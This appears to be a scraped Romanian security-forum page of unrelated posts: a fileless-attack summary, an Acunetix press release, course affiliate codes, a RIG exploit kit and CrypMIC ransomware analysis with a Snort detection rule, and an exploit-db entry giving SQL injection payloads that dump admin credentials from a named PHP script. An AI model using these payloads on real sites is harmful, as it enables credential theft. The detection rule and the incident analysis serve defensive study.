Leaderboard

During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“. Read more: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/

Pe langa asta, ar trebui introduse si cursuri de prim-ajutor !!! sunt mult mai utile decat alte kkturi de materii inventate doar ca sa aibe niste labari de pilosi ce se cred profesori loc de munca.

Acunetix Release Web Site Security Pen Testing Tools Free POSTED ON JANUARY 10, 2017 BY TAMARA NAUDI HTTP editor, fuzzer and sniffer tools help pen testers identify vulnerabilities London, UK – January 2016 – Hot on the release of Acunetix Version 11, pioneering web application security software Acunetix, now delivering Manual Pen Testing Tools at no cost. Penetration testers can make use of an HTTP Editor to modify or craft HTTP requests and analyze responses; intercept and modify HTTP traffic on the fly using the integrated HTTP Sniffer; fuzz test HTTP requests using the HTTP Fuzzer and test Blind SQL Injection vulnerabilities further using the Blind SQL Injector, among others. “Acunetix has for the past decade been an excellent resource in the pentester’s tool kit. Prior to Acunetix v11, these Manual Pen Testing Tools were only available to Acunetix Customers. By releasing our manual tools separately, we aim to facilitate veteran testers as well as up and coming security researchers by making it easy to manually test web applications for logical flaws among others,” added Nicholas Sciberras, CTO, Acunetix. HTTP Editor: Allows you to create, analyze and edit client HTTP requests; as well as inspect server responses. It also includes an encoding and decoding tool to encode/decode text and URL’s to MD5 hashes, UTF-7 and other formats. HTTP Sniffer: A proxy that allows you to analyze HTTP requests and responses, and edit these while they are in transit. The HTTP sniffer can also be used to manually crawl a site, and use the manual crawl to seed an Acunetix scan. HTTP Fuzzer: A tool which allows you to automatically send a large number of HTTP requests including invalid, unexpected and random data to a website, to test input validation and handling of invalid data by the web application. Blind SQL Injector: An automated database data exfiltration tool. By using Blind SQL injection vulnerabilities discovered when scanning a website, it is possible to demonstrate the serious impact a Blind SQL injection vulnerability can have on the website. Used to enumerate databases, tables, fields and dump data from the vulnerable web application. Subdomain Scanner: Scans a top-level domain to discover subdomains configured in its hierarchy, by using the target domain’s DNS server, or any other DNS server specified by the user. While scanning, this tool will also automatically identify and inform the user if the domain being scanned is using some kind of wildcard characters, such as *.domain.com. Target Finder: An IP range / port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs. The list of ports on which the web servers are listening can also be configured. The default ports the scanner will scan are port 80 for HTTP and port 443 for SSL. Authentication Tester: Used to test the strength of both usernames and passwords within HTTP and web forms authentication environments via a dictionary attack. Download the FREE Manual Pen Testing Tools About Acunetix User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology that comprehensively scans and audits complex, authenticated, HTML5 and JavaScript-heavy websites among others. Acunetix detects over 3000 types of web application vulnerabilities and is the industry leader in detecting the largest variety of SQL injection and XSS vulnerabilities, including Out-of-band SQL injection and DOM-based XSS. Acunetix beats competing products in many areas; including speed, limiting false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of management and regulatory reports including ISO 27001 and PCI compliance. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats. Acunetix is available on premises or as an online solution. Acunetix, the company Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe and many more. Sursa: https://www.acunetix.com/blog/news/acunetix-release-web-site-security-pen-testing-tools-free/

Syllabus Section: Preliminary Skills - Prerequisites Module 1 : Introduction Module 2 : Networking Module 3 : Web Applications Module 4 : Penetration Testing Section: Preliminary Skills - Programming Module 1 : C++ Module 2 : Python Section: Penetration Testing Module 1 : Information Gathering Module 2 : Footprinting & Scanning Module 3 : Vulnerability Assessment Module 4 : Web Attacks Module 5 : System Attacks Module 6 : Network Attacks Invitatie: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK

DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows can not boot, missing MBR, want to format the hard drive, remove viruses and so on, you can simply use the DLC Boot 2016 to resolve these issue. DLC Boot 2016 is also able to backup / restore windows partition, create partitions, entering a locked Windows, and much more! * Integrated Mini Windows 10 32/64 bit * Integrated Mini Windows XP deducted from Hiren's version 15.2 and has been built, optimized again. TOOLS LIST: Download: https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download

Macar de ar preda o lectie de baza: "Nu deschideti orice prostie care v-o recomanda cineva".

Buna comparatie ai facut si tu. Bine ca nu ai comparat Romania cu America. :)))

# # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # Etc....Other files have vulnerabilities ... # # # # # Sursa: https://www.exploit-db.com/exploits/41267/.

Acum 2 saptamani nu stia ce e ala meta charset si acum face bypass-uri, tataia e interesat de un bypass ca e cu inima E facut copy paste de pe alt site; nici macar nu te-ai chinuit sa traduci

RIG Exploit Kit Overview The following image shows an example of an iFrame which has been injected into a compromised website. The iFrame redirects users to a proxy that hosts the RIG exploit kit landing page. The RIG infrastructure itself, as shown below, is optimized to segregate servers that host the landing page, exploits and payloads. Victims are only able to see the proxy server with the landing page; resellers and customers are only able to work with the admin server. The actual exploits are stored on the VDS under custody of the RIG crew [2]. After the user is redirected to the proxy, it attempts to exploit the victim’s machine if it is using outdated components such as Adobe Flash. If successful, the RIG exploit kit will then drop and execute CrypMIC ransomware onto the machine and encrypt all files silently in the background. CrypMIC ransomware is still fairly new and it wants to follow the footsteps of the very popular CryptXXX ransomware. It can encrypt 901 different types of files to which it doesn’t add an extension unlike for example Locky, where .locky is added to the end of each file making it easier to detect [3,4]. This ransomware is particularly dangerous for business organizations because of its ability to encrypt files on removable and network drives. During encryption, the ransomware replaces the user’s wallpaper with the one shown below. The image states that RSA-4096 is used for encryption when, in fact, research has shown that CrypMIC uses AES-256 [3,4]. The same information is placed in the form of pictures and text files into every folder that is encrypted. The amount of ransom demanded varies from 1.2 to 2.4 bitcoin, that is between $792 and $1,597 [5]. The user is being prompted to download TOR, a network that disguises their identity by moving traffic across different TOR servers and encrypting that traffic, and visit a payment page similar to the one shown below. After payment is received, the victim is supposedly able to download the “Microsoft Decryptor” (please note that this tool has nothing to do with Microsoft). As with all ransomware, the delivery of a decryptor tool and therefore the successful decryption of files is not guaranteed. The question of whether to pay or not to pay has been discussed rigorously throughout the industry. The recent articles about ransomware payment by Nettitude, Kaspersky and Sophos, to name but a few, all have a similar tone: there is no guarantee that the cyber criminals will deliver the key that is required to successfully decrypt the files and in many cases the data is irretrievably lost. It is therefore strongly advised that payments should not be made [6, 7, 8]. Intrusion Detection Systems, such as Snort, provide signatures for the RIG exploit kit. The signature ID for Snort is 33905 . The following rule is associated with the SID: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"EXPLOIT-KIT Rig exploit kit outbound commu nication"; flow:established,to_server; urilen:>220,norm; content:"/index.php?"; depth:11; http_uri; c ontent:"=l3S"; within:4; distance:15; fast_pattern; http_uri; pcre:"/^\\/index\\.php\\?[A-Za-z0-9_-] {15}=l3S/U"; flowbits:set,file.exploit_kit.flash; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:3 3905; rev:3;) The rule looks for a connection from IP’s defined in the variable $HOME_NET to IP’s defined in the variable $EXTERNAL_NET on port 80. It will only match URI’s that are greater than 220 bytes. The image below shows an example of a malicious string that matches the Snort signature. As mentioned above, the exploit kit injects iFrames into compromised websites to redirect users to a proxy. A comparison of several packet captures containing the RIG exploit kit has shown that the iFrame redirection after the URL is always between 169 and 175 bytes long. The first 16 bytes are truly random characters that change with every iFrame injected into a website. The next 24 bytes are random characters as well, but the comparison has shown that these characters remain the same. The remaining bytes are randomly generated, dependent on the actual payload that is being delivered. More random characters are added on, resulting in a string that is always larger than 220 bytes. To reduce the possibility of false positives, the IDS/IPS rule is very specific by looking for the string index.php? in the first 11 bytes of the payload, then ignores the next 15 bytes and then looks for the string =l3S The string =l3S however, has to match within the next 4 bytes. As security professionals, we have to investigate this alarm, as well as any associated alarms, to determine whether the exploit kit was successfully delivered and executed. A good way to start an investigation is to look up the IP address at VirusTotal (virustotal.com). However, the IP’s change so frequently that the result of VirusTotal alone should not be taken as an indication for success or failure. As a next step, a search for the IP address using URLQuery (urlquery.net) provides a good indication as to whether the IP has been flagged as malicious. Furthermore, URLQuery will show you a screenshot of what the actual website looks like without resolving the IP on your machine and potentially risking an infection. As the image below demonstrates, the website has been associated with the RIG exploit kit. A packet capture helps us to investigate this alarm further. The website malware-traffic-analysis.net provides some packet captures that show the delivery of the exploit kit from the exact same IP addresses that we have observed in the last two weeks [10]. A look at the packet capture provides some useful information about the computer that has been infected with the RIG Exploit Kit. If we take a closer look at the User-Agent above, we can see that the victim is running Windows 7 (Windows NT 6.1) and an outdated browser, Internet Explorer 8. Additionally, we can see that the victim is using a vulnerable version of Adobe Flash by looking at the x-flash-version, which indicates a version of 11.9.900.117. A quick search for Adobe’s Security Bulletin reveals that Adobe has released security updates for Adobe Flash Player 11.9.900.117 and earlier versions [11]. The HTTP object list in the image below shows the content types that are transmitted; application/x-msdownload is associated with .exe and .dll files, while application/x-shockwave-flash is related to Adobe Flash. We have already identified that the victim was running a vulnerable version of Adobe Flash which was exploited to deliver the malicious payload. The image below shows post-infection traffic to 65.49.8.96 and the same IP has been observed throughout various packet captures related to CrypMIC ransomware. At this point, we can conclude that the user has visited a compromised website and was redirected to the proxy server. An outdated version of Adobe Flash was identified and exploited and the malicious payload was successfully dropped and executed. As a result, all files on the hard drive were encrypted and a ransom demanded. Without having a packet capture, it is relatively hard to determine the actual success of the delivery of ransomware but an outbound connection to a known malicious site should always be an indicator of success. If the host wasn’t infected it wouldn’t need to communicate to that IP address. As a countermeasure we would recommend, if possible, taking the infected host offline, scanning it for malicious software and blocking the IP address at the perimeter firewall. Blocking the IP alone is not an effective countermeasure because it does not treat the root cause of the problem: a potentially infected host. At this point it doesn’t matter whether the request to the potentially malicious site was blocked by a proxy or a firewall; the fact still remains that there is a host on a network that is actively trying to establish an outbound communication to a malicious site. Conclusion Ransomware has become one of the most feared cyber threats in recent years. The FBI predicts a total loss of around 1 billion US dollars caused by crypto-ransomware in 2016 [12]. CrypMIC was neither the first ransomware, nor will it be the last but it shares the common goal: extort money. Ransomware targets everyone. The same attack can harm an international organization as well as a local restaurant or private Internet users. Ransomware is usually only detected after the malicious software has been installed and files have been encrypted making an early detection all the more important. Intrusion prevention systems can trigger and block a predictable chain of events that happens during the Diffie-Hellman key exchange. If you are able to block the key exchange, you can avoid that files are being encrypted because the ransomware won’t progress beyond this point. Ransomware continues to be one of the biggest cyber threats and we cannot simply rely on detecting ransomware from one single source. Instead, we must deploy a comprehensive solution: proactively monitoring traffic and logs to detect ransomware as early as possible. thecount.

nici tu nu te crezi, mai ales la bypass pentru icloud.

Mai am si eu un invite in caz de ceva : https://www.elearnsecurity.com/affiliate/redeem SIH-BRO

Un tub catodic magnetizat distorsionează culorile. Electronii eliberați de filamentul incandescent al tunului electronic sunt atrași de câmpul electric puternic, prin vid, către suprafața ecranului. Aceștia, trecând prin câmpul magnetic al bobinei de deflexie, sunt deviați, formând imaginea pe ecran. Un câmp magnetic nedorit ar devia electronii din tub, fapt care ar distorsiona imaginea. Un LCD folosește o matrice de tranzistori care aplica un câmp electric, reorientând niște cristale lichide prin intermediul unor electrozi transparenți. Cristalele lichide se află între două filtre polarizante, orientate la 90° unul față de altul (deci ecranul blochează lumina, devine opac). Acestea (cristalele lichide), au rolul de a reorienta lumina polarizată de către un filtru către celălalt filtru, în așa fel, încât lumina va răzbate prin cel de al II-lea filtru, în acest fel, ecranul devenind transparent. Unghiul de răsucire al cristalelor este direct proporțional cu potențialul electric dintre electrozii transparenți care cuprind lichidul ca într-un sanwich. Formarea imaginii pe un ecran LCD este influențată doar de către acel potențial electric aplicat pe acei electrozi transparenți care reglează intensitatea (opacitatea) fiecărui subpixel (R, G sau B). Cristalele lichide fiind nonmagnetice iar electronii circuland doar prin conductori (nu sunt eliberați în vid), ecranul LCD nu poate fi afectat de către câmpurile magnetice și nici magnetizat. Deci imaginea generată de un ecran LCD nu poate fi distorsionată de către un câmp magnetic. Spor la treabă!

Ban.

Domenii .com & .net la numai 0.29Euro / primul an https://www.hostalia.com/